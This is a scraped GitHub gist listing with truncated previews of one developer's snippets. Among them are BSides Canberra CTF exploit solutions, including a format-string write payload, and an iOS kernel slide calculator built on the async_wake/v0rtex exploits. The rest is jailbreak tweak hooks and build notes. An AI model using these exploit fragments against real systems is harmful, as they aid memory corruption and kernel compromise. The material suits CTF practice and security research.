Skip to content

Instantly share code, notes, and snippets.

George Dan ninjaprawn

Block or report user

Report or block ninjaprawn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ninjaprawn
ninjaprawn / exp_neo_boffy.py
Created Jul 17, 2018
Solution to Neo Boffy from the BSides Canberra CTF 2018
View exp_neo_boffy.py
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
@ninjaprawn
ninjaprawn / dsc_changes
Created Jun 4, 2018
Changes in the iOS 12 dsc
View dsc_changes
Added:
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
@ninjaprawn
ninjaprawn / exp_fat_morphine.py
Created May 31, 2018
Solution to Fat Morphine from the BSides Canberra CTF 2018
View exp_fat_morphine.py
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x" # What we are writing
payload += "%{}$lln" # How we write it
payload += "\x30\x0d\x60" # Where we write it
payload = payload.format(10)
@ninjaprawn
ninjaprawn / slide.c
Last active Dec 12, 2017
async_wake_ios slide calculator - based of Siguza's v0rtex method of calculating the slide
View slide.c
/*
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
*/
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
View installing theos
brew install dpkg ldid
cd ~
git clone --recursive https://github.com/theos/theos.git
echo "export THEOS=~/theos" >> .bash_profile
View limitless301016.log
Showing All Messages
Build target Limitless of project Limitless with configuration Debug
PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/Limitless.build/Debug-iphoneos/Limitless.build/Script-FA25322E1DE0FB2800D4FA86.sh
cd /Volumes/Files/Developer/Limitless
export ACTION=build
export AD_HOC_CODE_SIGNING_ALLOWED=NO
export ALTERNATE_GROUP=staff
View wtf.xm
...
@property (strong, nonatomic) NSString *currentPhoneNumber;
...
-(NSMutableArray*)getHiddenNumbers {
NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"];
if (hiddenNumbers == nil) {
return [[NSMutableArray alloc] init];
}
return [NSMutableArray arrayWithArray:hiddenNumbers];
@ninjaprawn
ninjaprawn / privateclassaccessability
Created Dec 24, 2015
List of private classes/functions that can be accessed magically
View privateclassaccessability
SBUIController - NO (Protected by FrontBoard)
SBIconController - NO (Protected by FrontBoard)
SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen])
SBWallpaperController - NO (Protected by FrontBoard)
SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time)
@ninjaprawn
ninjaprawn / record.xm
Created Oct 24, 2015
random attempt to record screen
View record.xm
%hook BSPlatform
- (BOOL)isInternalInstall {
return YES;
}
%end
@ninjaprawn
ninjaprawn / tweak.xm
Last active Aug 10, 2016
it was greeny D:
View tweak.xm
@interface SBApplicationController
+(id)sharedInstance;
-(id)applicationWithBundleIdentifier:(id)arg1 ;
@end
@interface SBApplication
@end
@interface SBApplicationIcon : NSObject
-(id)initWithApplication:(id)arg1 ;
You can’t perform that action at this time.